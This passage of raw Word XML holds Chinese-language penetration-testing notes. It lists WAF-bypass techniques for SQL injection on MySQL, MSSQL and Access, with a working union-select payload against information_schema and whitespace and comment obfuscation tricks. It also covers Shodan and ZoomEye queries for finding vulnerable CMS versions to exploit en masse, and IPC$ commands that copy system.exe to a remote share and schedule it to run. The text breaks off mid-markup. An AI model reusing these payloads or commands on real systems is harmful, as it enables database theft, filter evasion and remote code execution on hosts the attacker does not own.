    <w:p w14:paraId="70337B06" w14:textId="72804582" w:rsidR="00A40993" w:rsidRDefault="00577B8E" w:rsidP="00577B8E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ex编码</w:t>
      </w:r>
      <w:r w:rsidR="00A40993">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="412873BD" wp14:editId="47ECFD77">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>570865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1359535"/>
            <wp:effectExtent l="0" t="0" r="254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F0A10" w14:textId="77777777" w:rsidR="00C00103" w:rsidRDefault="00C00103" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and /*!1*/=/*!2*/ union select /*!1*/,/*!table_name*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/ from information_schema.tables where table_schema=0x6A69616E limit 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4200F8" w14:textId="1A78FA2B" w:rsidR="00C00103" w:rsidRDefault="00E03C8D" w:rsidP="00E03C8D">
      <w:r>
        <w:t>Access可以利用的空白字符有：%09、%0a、%0c、%0d、%16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59362A87" w14:textId="77777777" w:rsidR="00336BC5" w:rsidRDefault="00336BC5" w:rsidP="00A40993">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00336BC5">
        <w:t>Access数据库中没有注释符号.因此  /**/   、 --   和   #   都没法使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369526A8" w14:textId="0963EADF" w:rsidR="00A40993" w:rsidRPr="00A40993" w:rsidRDefault="00A40993" w:rsidP="00A4099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40993">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ASP+MSSQL:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40993">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40993">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%a0</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40993">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，已放弃。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F8BA20" w14:textId="77777777" w:rsidR="00A40993" w:rsidRPr="00A40993" w:rsidRDefault="00A40993" w:rsidP="00A4099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40993">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ASPX+MSSQL: %a0+%0a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40993">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配合，可成功绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40993">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>union select</w:t>
      </w:r>
      <w:r w:rsidRPr="00A40993">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362BFE1" w14:textId="77777777" w:rsidR="00A40993" w:rsidRPr="00A40993" w:rsidRDefault="00A40993" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rStyle w:val="com"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252C1F49" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/huanghelouzi/article/details/82995313</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5901109E" w14:textId="3E5C1DA7" w:rsidR="00FC2697" w:rsidRDefault="00BB3AB0" w:rsidP="00BB29BE">
      <w:hyperlink r:id="rId169" w:history="1">
        <w:r w:rsidR="004F1A15" w:rsidRPr="0052521C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/201790.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EEA599F" w14:textId="77777777" w:rsidR="00F51BAD" w:rsidRDefault="00F51BAD" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="7F8BBF80" w14:textId="589662BB" w:rsidR="004F1A15" w:rsidRPr="00F51BAD" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2697">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>防火墙，一般都采用正则的方式进行拦截的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E821E" w14:textId="77777777" w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基础绕过大小写、双重写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9FADD1" w14:textId="726CF23F" w:rsidR="00531A8E" w:rsidRPr="00F51BAD" w:rsidRDefault="00531A8E" w:rsidP="00F51BAD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567482"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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协议层面绕过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WAF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的检测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、协议未覆盖绕过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WAF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*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请求方式变换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 xml:space="preserve"> get  -&gt;  post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*content-type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变换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2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、参数污染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index.php?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&amp;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2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2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waf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可能只检测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</w:p>
    <w:p w14:paraId="6BDBF3D4" w14:textId="77777777" w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00FC2697">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7026021A" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在/*之间插入内容*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>/*!50000select*/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B8379" w14:textId="77777777" w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>http://www.hacker.com/news/index.jsp?id=2862′ and/*%23%0a*/1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095FA5AF" w14:textId="77777777" w:rsidR="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="3563CD44" w14:textId="77777777" w:rsidR="00531A8E" w:rsidRPr="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00531A8E">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F5F9"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="567482"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者/**/代替空格 例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00531A8E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r w:rsidRPr="00531A8E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r w:rsidRPr="00531A8E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6875D" w14:textId="77777777" w:rsidR="00531A8E" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:t>等价替换：and -&gt; &amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidR="00531A8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、%26%26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43D692" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:t>or -&gt; ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746AA82B" w14:textId="77777777" w:rsidR="005B74A2" w:rsidRDefault="006D676B" w:rsidP="00BB29BE">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Blanks=('%09', '%0A', '%0B', '%0C', '%0D', '%a0')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B8C70" w14:textId="35FE3602" w:rsidR="006D676B" w:rsidRDefault="005B74A2" w:rsidP="00BB29BE">
      <w:r w:rsidRPr="005B74A2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Mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中可以利用的空白字符有：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>%09,%0a,%0b,%0c,%0d,%20,%a0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18975FA9" w14:textId="77777777" w:rsidR="00531A8E" w:rsidRDefault="00531A8E" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B3E65A7" wp14:editId="03CE9C3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1802130"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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0A8BA" w14:textId="6BBAA586" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8">
      <w:r>
        <w:t>1、最常见形式 %20、+、/**/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F458151" w14:textId="50C9E09C" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8">
      <w:r>
        <w:t>2、Mysql中可以利用的空白字符有：%09,%0a,%0b,%0c,%0d,%20,%a0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19708772" w14:textId="18D57A84" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00FB2EB8">
      <w:r>
        <w:t>3、内联注释 /!12345select/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A26F0D4" w14:textId="31AEC557" w:rsidR="00FB2EB8" w:rsidRDefault="00FB2EB8" w:rsidP="00F51BAD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过组合测试，可以发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> union%0a/!12345select/ 1,2 可以绕过防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023D8800" w14:textId="77434CFE" w:rsidR="00FC2697" w:rsidRDefault="00FC2697" w:rsidP="00FC2697">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>mssql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282806FB" w14:textId="05E4B2DF" w:rsidR="004F1A15" w:rsidRPr="00F51BAD" w:rsidRDefault="00FC2697" w:rsidP="00BB29BE">
      <w:r>
        <w:t>se%le%ct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A08FF8" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="0095496E" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用注释符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BFED32" w14:textId="77777777" w:rsidR="0095496E" w:rsidRPr="0095496E" w:rsidRDefault="0095496E" w:rsidP="009549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496E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//，-- , /**/, #, --+, -- -, ;,%00,--a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FB514F" w14:textId="77777777" w:rsidR="004F1A15" w:rsidRDefault="004F1A15" w:rsidP="00BB29BE"/>
    <w:p w14:paraId="51555738" w14:textId="6B1A42C9" w:rsidR="004F1A15" w:rsidRPr="004F1A15" w:rsidRDefault="0095496E" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLEncode编码，ASCII,HEX,unicode编码绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FFD0F1" w14:textId="77777777" w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="00D11994">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索引擎的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFF7FF8" w14:textId="77777777" w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>hodan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD45CE" w14:textId="77777777" w:rsidR="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCBBB37" w14:textId="77777777" w:rsidR="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED9FC7B" w14:textId="77777777" w:rsidR="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB7C9CF" w14:textId="77777777" w:rsidR="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C5DCD8" w14:textId="77777777" w:rsidR="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B631B8" w14:textId="77777777" w:rsidR="008027AB" w:rsidRPr="008027AB" w:rsidRDefault="008027AB" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199E4560" w14:textId="77777777" w:rsidR="00D11994" w:rsidRPr="008027AB" w:rsidRDefault="00D11994" w:rsidP="00D11994">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidRPr="008027AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>oomeye</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D82C12" w14:textId="77777777" w:rsidR="00103D75" w:rsidRDefault="00103D75" w:rsidP="00103D75">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1、app:apache ------------ 组件名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2、ver:2.2.9 ------------- 版本号</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3、 port:22 ----------- 端口号</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">4、service:ssh ------------- </w:t>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索服务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>5、os:linux --------- 操作系统类型</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>6、hostname:google.com ------------- 分析列表“主机名”字段</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>7、country:cn city:hefei--------------查找国家代码谷歌浏览器翻墙查看</w:t>
      </w:r>
      <w:hyperlink r:id="rId171" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>此链接当前页"互联网"字段或“ISO 3166 2位字母代码”字段（注：英国gb）</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
        <w:t>8、ip:8.8.8.8 ------------ip地址</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>9、cidr:8.8.8.8/24--------ip地址网段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F9138" w14:textId="77777777" w:rsidR="00103D75" w:rsidRDefault="00103D75" w:rsidP="00103D75">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:t>实例：php app</w:t>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003853C3">
        <w:t>edeCMS ver:5.7.48 比如某天某个版本的cms出现了漏洞，你需要去刷一波</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512F3A7" w14:textId="77777777" w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="00D11994"/>
    <w:p w14:paraId="331A0D22" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00D11994"/>
    <w:p w14:paraId="0976A56D" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00D11994"/>
    <w:p w14:paraId="27B4F26F" w14:textId="3C57D0FC" w:rsidR="00F91404" w:rsidRDefault="00760CA7" w:rsidP="00760CA7">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于前端漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A0359" w14:textId="7EBAABE2" w:rsidR="00760CA7" w:rsidRDefault="00BB3AB0" w:rsidP="00D11994">
      <w:hyperlink r:id="rId172" w:history="1">
        <w:r w:rsidR="00760CA7" w:rsidRPr="002E4B0C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/qq_32727277/article/details/102717231</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D7F7474" w14:textId="363DFC61" w:rsidR="00760CA7" w:rsidRDefault="00760CA7" w:rsidP="00D11994">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>前端本身泄露了这个受保护的cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0307D72E" w14:textId="5786C777" w:rsidR="00760CA7" w:rsidRDefault="00BB3AB0" w:rsidP="00D11994">
      <w:hyperlink r:id="rId173" w:history="1">
        <w:r w:rsidR="00760CA7" w:rsidRPr="002E4B0C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.secpulse.com/archives/35877.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3EC266BA" w14:textId="4267FF05" w:rsidR="00760CA7" w:rsidRDefault="00760CA7" w:rsidP="00D11994">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（前端漏洞的挖掘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAF4A25" w14:textId="5D8B3138" w:rsidR="00F3231A" w:rsidRDefault="00BB3AB0" w:rsidP="00D11994">
      <w:hyperlink r:id="rId174" w:history="1">
        <w:r w:rsidR="00F3231A" w:rsidRPr="002E4B0C">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/badmoonc/article/details/82289252</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C3987B2" w14:textId="0A940408" w:rsidR="00F3231A" w:rsidRPr="00F3231A" w:rsidRDefault="00F3231A" w:rsidP="00D11994">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（jsonp跨域原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C549C3" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ABBBF2" w14:textId="77777777" w:rsidR="001C373D" w:rsidRPr="001C373D" w:rsidRDefault="001C373D" w:rsidP="001C373D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>站)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3156014A" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t xml:space="preserve">net use \\ip\ipc$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7C4D92" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="7AB8C422" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="1D495459" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>copy d:\system.exe \\ip\c$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2135A7E3" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="227662DE" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>net time \\ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BBA95A" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="645CBF34" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>at \\ip shij c:\system.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5520221A" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
